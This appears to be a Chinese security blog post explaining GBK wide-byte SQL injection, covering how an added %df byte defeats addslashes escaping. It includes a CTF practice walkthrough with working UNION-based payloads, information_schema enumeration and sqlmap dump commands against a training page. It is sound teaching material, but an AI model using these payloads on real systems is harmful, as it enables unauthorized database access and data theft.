<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.9.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description"><title>宽字节注入 | 人间且慢行</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"></head><meta name="referrer" content="no-referrer-when-downgrade"><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">宽字节注入</h1><a id="logo" href="/.">人间且慢行</a><p class="description"></p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">宽字节注入</h1><div class="post-meta">Sep 5, 2019<span> | </span><span class="category"><a href="/categories/安全/">安全</a></span><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><span id="busuanzi_container_page_pv"> | <span id="busuanzi_value_page_pv"></span><span> 阅读</span></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#宽字节注入"><span class="toc-number">1.</span> <span class="toc-text">宽字节注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#URL转码"><span class="toc-number">1.0.1.</span> <span class="toc-text">URL转码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#宽字节注入原理"><span class="toc-number">1.0.2.</span> <span class="toc-text">宽字节注入原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#练习"><span class="toc-number">1.0.3.</span> <span class="toc-text">练习</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#sqlmap实现注入"><span class="toc-number">1.0.3.1.</span> <span class="toc-text">sqlmap实现注入</span></a></li></ol></li></ol></li></ol></div></div><div class="post-content"><h1 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h1><h3 id="URL转码"><a href="#URL转码" class="headerlink" title="URL转码"></a>URL转码</h3><ul>
<li>空格  —— %20</li>
<li>‘ ——%27</li>
<li>#——%23</li>
<li>\——%5C<ul>
<li>addslashes函数</li>
</ul>
</li>
</ul>
<p><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/7TAiR4DysR.png" alt="2"><br>如何从addslashes函数逃逸出来？</p>
<ol>
<li>\前面再加一个\（或单数个），变成\‘,这样\被转义了，’逃出了限制</li>
<li>把\弄没</li>
</ol>
<h3 id="宽字节注入原理"><a href="#宽字节注入原理" class="headerlink" title="宽字节注入原理"></a>宽字节注入原理</h3><p><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/deAfmrmanM.png" alt="1"></p>
<ul>
<li>利用mysql的一个特性，mysql在使用GBK编码的时候，会认为两个字符是一个汉字（前一个ascii码要大于128，才能到汉字的范围)</li>
</ul>
<p>GBK中单引号的编码<br><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/aTaebsECYS.png" alt="2"></p>
<p>由于addslashes函数会在特殊符号前面加反斜线，&#39;的编码<br><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/MB2tiaXZD7.png" alt="3"></p>
<p>此时在前面加一个%df则，gbk会把前面两个%的字符当做一个汉字进行编码，因此最后的%27会被编码为’，使得单引号逃逸出来<br><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/4ZSe8ybxxX.png" alt="4"></p>
<p>这个时候要注意到，其实是由于数据库使用GBK编码的，而不是因为前端的执行</p>
<h3 id="练习"><a href="#练习" class="headerlink" title="练习"></a>练习</h3><p><a href="http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1" target="_blank" rel="noopener">南邮-宽字节注入练习</a></p>
<p>先在后面加一个单引号，发现自动添加了一个反斜线，这就用到我们学的知识，加一个%df（这里加的不一定是df，大于128都可以转义为汉字）发现是可以的</p>
<p>5<br>此时加#把后面的代码注释掉，发现没有报错，试着把#变为%23，输入</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//chinalover.sinaapp.com/SQL-GBK/index.php </span></span><br><span class="line">?id=1%aa' <span class="keyword">order</span> <span class="keyword">by</span> 2 %23<span class="comment">//报错</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">order</span> <span class="keyword">by</span> 3 %23<span class="comment">//不报错</span></span><br><span class="line"><span class="comment">//页面以及字段信息正常回显（因此该注入支持union联合查询注入）</span></span><br></pre></td></tr></table></figure>

<p>说明它的列数就是2</p>
<p>接下来暴字段位置(数据库中，对表的行和列都有特殊的叫法，每一列叫做一个“字段”)</p>
<figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%dd%<span class="number">27</span> and <span class="number">1</span>=<span class="number">2</span> <span class="class"><span class="keyword">union</span> <span class="title">select</span> 1,<span class="title">database</span>() %23</span></span><br></pre></td></tr></table></figure>

<p>此时它对库名的单引号前加了反斜杠<br><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/MJDdsrXKnh.png" alt="7"></p>
<p>解决办法是使用database（）代替表名</p>
<figure class="highlight xquery"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">?id</span>=<span class="number">1</span><span class="meta">%dd</span><span class="meta">%27</span> <span class="keyword">and</span> <span class="number">1</span>=<span class="number">2</span> <span class="keyword">union</span> select <span class="number">1</span>,TABLE_NAME from information_schema.TABLES <span class="keyword">where</span> TABLE_SCHEMA = database()<span class="meta">%23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/xRWbEiRFxN.png" alt="8"><br>可以看到表名是ctf，那么除了ctf之外会不会有其他表呢？<br>group_concat()<br> 函数将一个组中的字符串连接成一个具有各种选项的字符串。</p>
<p><code>?id=1%dd%27 and 1=2 union select 1,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA = database()%23</code><br><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/yeZfkKPKwQ.png" alt="9"><br>此时一个个查表<br><code>?id=1%dd%27 and 1=2 union select 1,group_concat(column_NAME) from information_schema.columns where table_name = ctf%23</code></p>
<p>但直接输ctf是不行的，因为它没有可以代替的全局变量，此时可以转换为16进制，因为mysql中会认识</p>
<p><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/HKN2rnGw5i.png" alt="10"></p>
<p>假设存在flag则输入<br><code>?id=1%dd%27 and 1=2 union select 1,group_concat(pw) from ctf%23</code></p>
<p><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/Rx4QJ2E3SK.png" alt="11"><br>这个可能不是我们想要的，因此需要一张张查询</p>
<h4 id="sqlmap实现注入"><a href="#sqlmap实现注入" class="headerlink" title="sqlmap实现注入"></a>sqlmap实现注入</h4><p><code>sqlmap -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%aa%27  -hex</code></p>
<p><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/fzQRPbDh5Z.png" alt="12"></p>
<p><code>sqlmap -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%aa%27 --hex -D sae-chinalover --tables</code></p>
<p><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/abC8y4D2DY.png" alt="13"></p>
<p><code>sqlmap -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%aa%27 --hex -D sae-chinalover -T ctf2 --dump</code></p>
<p><img src="http://yuntu88.oss-cn-beijing.aliyuncs.com/fromlocal/2896251617@qq.com/20190905/NRCxMEaKza.png" alt="14"></p>
</div><div class="tags"><a href="/tags/web安全-ctf/">web安全 ctf</a></div><div class="post-nav"><a class="pre" href="/2019/09/07/约束条件的安全测试——报错注入/">约束条件的安全测试_报错注入</a><a class="next" href="/2019/09/03/集合和映射/">集合和映射</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><form class="search-form" action="//www.google.com/search" method="get" accept-charset="utf-8" target="_blank"><input type="text" name="q" maxlength="20" placeholder="Search"><input type="hidden" name="sitesearch" value="http://yoursite.com"></form></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/信安之路/">信安之路</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/基础知识/">基础知识</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/安全/">安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/读书/">读书</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/转载/">转载</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/web安全-ctf/" style="font-size: 15px;">web安全 ctf</a> <a href="/tags/随笔/" style="font-size: 15px;">随笔</a> <a href="/tags/计算机网络/" style="font-size: 15px;">计算机网络</a> <a href="/tags/博客搭建/" style="font-size: 15px;">博客搭建</a> <a href="/tags/安全/" style="font-size: 15px;">安全</a> <a href="/tags/基础/" style="font-size: 15px;">基础</a> <a href="/tags/数据结构/" style="font-size: 15px;">数据结构</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/09/15/insert等数据表相关操作的注入及例题/">insert等数据表相关操作的注入及例题</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/15/1.文件上传/">文件上传</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/14/desc相关例题/">desc相关注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/13/order by/">order by注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/12/bool型盲注/">bool型盲注</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/10/基于时间盲注的部分相关函数/">基于时间盲注的部分相关函数</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/07/约束条件的安全测试——报错注入/">约束条件的安全测试_报错注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/05/宽字节注入/">宽字节注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/03/集合和映射/">集合和映射</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/25/OSI参考模型的理解/">OSI参考模型的</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div><ul></ul><a target="_blank"></a><ul></ul><a target="_blank"></a><ul></ul><a target="_blank"></a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2019 <a href="/." rel="nofollow">人间且慢行.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=0.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.0" async></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css"><script type="text/javascript" color="0,0,0" opacity="0.5" zindex="-2" count="50" src="//lib.baomitu.com/canvas-nest.js/2.0.4/canvas-nest.umd.js"></script><script type="text/javascript" src="/js/codeblock-resizer.js?v=0.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=0.0.0"></script></div></body></html>